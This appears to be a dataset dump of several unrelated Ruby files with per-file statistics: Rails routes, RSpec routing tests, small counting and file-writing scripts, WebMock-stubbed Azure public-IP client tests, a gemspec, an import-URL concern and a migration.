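#   RSpec.describe 'mood enum' do
#     it 'exists with the expected labels' do
#       expect(db).to have_enum(:mood).with_values(%w[happy sad])
#     end
#   end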
| 25.3 | 124 | 0.539243 |
5dbad98d53efcb327f26b34620ac53736197b001 | 513 | Rails.application.routes.draw do
# Authetication Route - JWT Token
post 'auth' => 'authentication#auth'
# District Routes
resources :districts, only: [:index, :show] do
# Judging Body Routes
resources :judging_bodies, only: [:index]
end
resources :judging_bodies, only: [:show]
# Process Class Routes
resources :process_classes, only: [:index, :show]
# Justice Process and Movements
resources :justice_processes do
resources :process_movements, only: [:index, :show]
end
end
| 24.428571 | 55 | 0.709552 |
21bd9c23014f6fb42d8c71688160982ef8114f6a | 895 | require "spec_helper"
module Stachio
describe TemplatesController do
describe "routing" do
it "routes to #index" do
get("/").should route_to("stachio/templates#index")
end
it "routes to #new" do
get("/new").should route_to("stachio/templates#new")
end
it "routes to #show" do
get("/1").should route_to("stachio/templates#show", :id => "1")
end
it "routes to #edit" do
get("/1/edit").should route_to("stachio/templates#edit", :id => "1")
end
it "routes to #create" do
post("/").should route_to("stachio/templates#create")
end
it "routes to #update" do
put("/1").should route_to("stachio/templates#update", :id => "1")
end
it "routes to #destroy" do
delete("/1").should route_to("stachio/templates#destroy", :id => "1")
end
end
end
end
| 23.552632 | 77 | 0.579888 |
1a71ddc2a0e3c077ba25c9d0a320cca75c278cc0 | 448 | # == Schema Information
#
# Table name: newsletters
#
# created_at :datetime not null
# id :bigint(8) not null, primary key
# published_on :date not null
# title :text not null
# updated_at :datetime not null
# url :text not null
#
class Newsletter < ApplicationRecord
has_one_attached :image
validates_presence_of :title, :url, :published_on
end
| 24.888889 | 55 | 0.587054 |
6a15cf3da3f2b949d840c6b7ba49d59f1a034cfa | 1,367 | @@max = ARGV[0] || 100
@@max = @@max.to_i
@@input = 0
@@output = 0
@@others = []
def commas n
n.to_s.reverse.gsub(/...(?=.)/,'\&,').reverse
end
class Counter
def initialize
@count = 0
@fanout = 0
@subsequent = {}
end
def value
@count
end
def subsequent seg
unless @subsequent.has_key? seg
@subsequent[seg] = Counter.new
@fanout += 1
end
return @subsequent[seg]
end
def count! segments
@count += 1 if segments.length == 0
return unless segments.length > 0
seg = segments.shift
if @fanout >= @@max
subsequent("(OTHER)").count! []
else
subsequent(seg).count! segments
end
end
def report keys
unless @count < 1 then
line = "#{keys.join(' / ')} -- #{@count}"
# puts line
@@others << line if keys.last == "(OTHER)"
@@output += 1
end
@subsequent.sort_by{|k,v| [-v.value, k]}.each do |key, count|
keys.push key
count.report keys
keys.pop
end
end
end
@root = Counter.new
STDIN.readlines.each do |line|
@@input += 1
seq = line.chomp.split(/[ \/\t?&]/)
# seq.shift
@root.count! seq
end
@root.report ['']
STDERR.puts "
If segments clamped to #{@@max} names:
#{commas @@input} input => #{commas @@output} output (#{'%.02f' % (100.0*(@@input-@@output)/@@input)}% clamped)
#{@@others.join("\n")}
"
| 18.726027 | 111 | 0.561083 |
0318170b22591d07d624e12d7d54f39938465642 | 597 | STDOUT.sync = true
Signal.trap("TERM") do
say "exiting"
exit
end
def say msg
puts "\t[inc] #{Time.now.strftime("%T")} #{$$} #{msg}"
end
class Inc
def initialize file
@file = file
end
def run
launched = Time.now.to_i
say "launching in #{File.dirname(@file)}"
i = 0
while i < 100
say "writing #{launched}/#{i} to #{File.basename(@file)}"
File.open(@file, "w") do |f|
f.puts(launched)
f.puts(i)
f.puts($$)
f.puts(Process.ppid)
end
sleep 0.5
i+=1
end
end
end
Inc.new(ARGV[0] || "./inc.txt").run
| 16.135135 | 63 | 0.537688 |
117cddb70945e0077bcea3cdbc24814a4bf274ec | 5,937 | # frozen_string_literal: true
require 'spec_helper'
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: true)
describe Bosh::AzureCloud::AzureClient do
let(:logger) { Bosh::Clouds::Config.logger }
let(:azure_client) do
Bosh::AzureCloud::AzureClient.new(
mock_azure_config,
logger
)
end
let(:subscription_id) { mock_azure_config.subscription_id }
let(:tenant_id) { mock_azure_config.tenant_id }
let(:api_version) { AZURE_API_VERSION }
let(:api_version_network) { AZURE_RESOURCE_PROVIDER_NETWORK }
let(:resource_group) { 'fake-resource-group-name' }
let(:request_id) { 'fake-request-id' }
let(:token_uri) { "https://login.microsoftonline.com/#{tenant_id}/oauth2/token?api-version=#{api_version}" }
let(:operation_status_link) { "https://management.azure.com/subscriptions/#{subscription_id}/operations/#{request_id}" }
let(:public_ip_name) { 'fake-public-ip-name' }
let(:valid_access_token) { 'valid-access-token' }
let(:expires_on) { (Time.new + 1800).to_i.to_s }
before do
allow(azure_client).to receive(:sleep)
end
describe '#create_public_ip' do
let(:public_ip_uri) { "https://management.azure.com/subscriptions/#{subscription_id}/resourceGroups/#{resource_group}/providers/Microsoft.Network/publicIPAddresses/#{public_ip_name}?api-version=#{api_version_network}" }
let(:location) { 'fake-location' }
context 'when token is valid, create operation is accepted and completed' do
context 'when creating static public ip' do
let(:public_ip_params) do
{
name: public_ip_name,
location: location,
idle_timeout_in_minutes: 4,
is_static: true
}
end
let(:fake_public_ip_request_body) do
{
'name' => public_ip_name,
'location' => location,
'properties' => {
'idleTimeoutInMinutes' => 4,
'publicIPAllocationMethod' => 'Static'
}
}
end
it 'should create a public ip without error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, public_ip_uri).with(body: fake_public_ip_request_body).to_return(
status: 200,
body: '',
headers: {
'azure-asyncoperation' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect do
azure_client.create_public_ip(resource_group, public_ip_params)
end.not_to raise_error
end
end
context 'when creating dynamic public ip' do
let(:public_ip_params) do
{
name: public_ip_name,
location: location,
idle_timeout_in_minutes: 4,
is_static: false
}
end
let(:fake_public_ip_request_body) do
{
'name' => public_ip_name,
'location' => location,
'properties' => {
'idleTimeoutInMinutes' => 4,
'publicIPAllocationMethod' => 'Dynamic'
}
}
end
it 'should create a public ip without error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, public_ip_uri).with(body: fake_public_ip_request_body).to_return(
status: 200,
body: '',
headers: {
'azure-asyncoperation' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect do
azure_client.create_public_ip(resource_group, public_ip_params)
end.not_to raise_error
end
end
context 'when creating public ip in a zone' do
let(:public_ip_params) do
{
name: public_ip_name,
location: location,
idle_timeout_in_minutes: 4,
is_static: false,
zone: 'fake-zone'
}
end
let(:fake_public_ip_request_body) do
{
'name' => public_ip_name,
'location' => location,
'properties' => {
'idleTimeoutInMinutes' => 4,
'publicIPAllocationMethod' => 'Static' # Standard SKUs require Static
},
'zones' => ['fake-zone'],
'sku' => { 'name' => 'Standard' }
}
end
it 'should create a public ip without error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, public_ip_uri).with(body: fake_public_ip_request_body).to_return(
status: 200,
body: '',
headers: {
'azure-asyncoperation' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect do
azure_client.create_public_ip(resource_group, public_ip_params)
end.not_to raise_error
end
end
end
end
end
| 31.247368 | 223 | 0.556847 |
e856acafe9465f45759751b1bc4c88cd20508be4 | 916 | lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "altria/processing_time/version"
Gem::Specification.new do |spec|
spec.name = "altria-processing_time"
spec.version = Altria::ProcessingTime::VERSION
spec.authors = ["Ryo Nakamura"]
spec.email = ["[email protected]"]
spec.summary = "Altria processing time chart plugin"
spec.homepage = "https://github.com/r7kamura/altria-processing_time"
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency "altria"
spec.add_dependency "chartkick"
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake"
end
| 38.166667 | 75 | 0.675764 |
28a3876810a57999ab904d05a7c5fb9e9fed4beb | 688 | # frozen_string_literal: true
module ImportUrlParams
def import_url_params
return {} unless params.dig(:project, :import_url).present?
{
import_url: import_params_to_full_url(params[:project]),
# We need to set import_type because attempting to retry an import by URL
# could leave a stale value around. This would erroneously cause an importer
# (e.g. import/export) to run.
import_type: 'git'
}
end
def import_params_to_full_url(params)
Gitlab::UrlSanitizer.new(
params[:import_url],
credentials: {
user: params[:import_url_user],
password: params[:import_url_password]
}
).full_url
end
end
| 26.461538 | 82 | 0.68314 |
f8a4c834e7e84f336fe421bb681c514008ad1dd4 | 131 | class AddUserIdToDiscussions < ActiveRecord::Migration[5.2]
def change
add_column :discussions, :user_id, :integer
end
end
| 21.833333 | 59 | 0.763359 |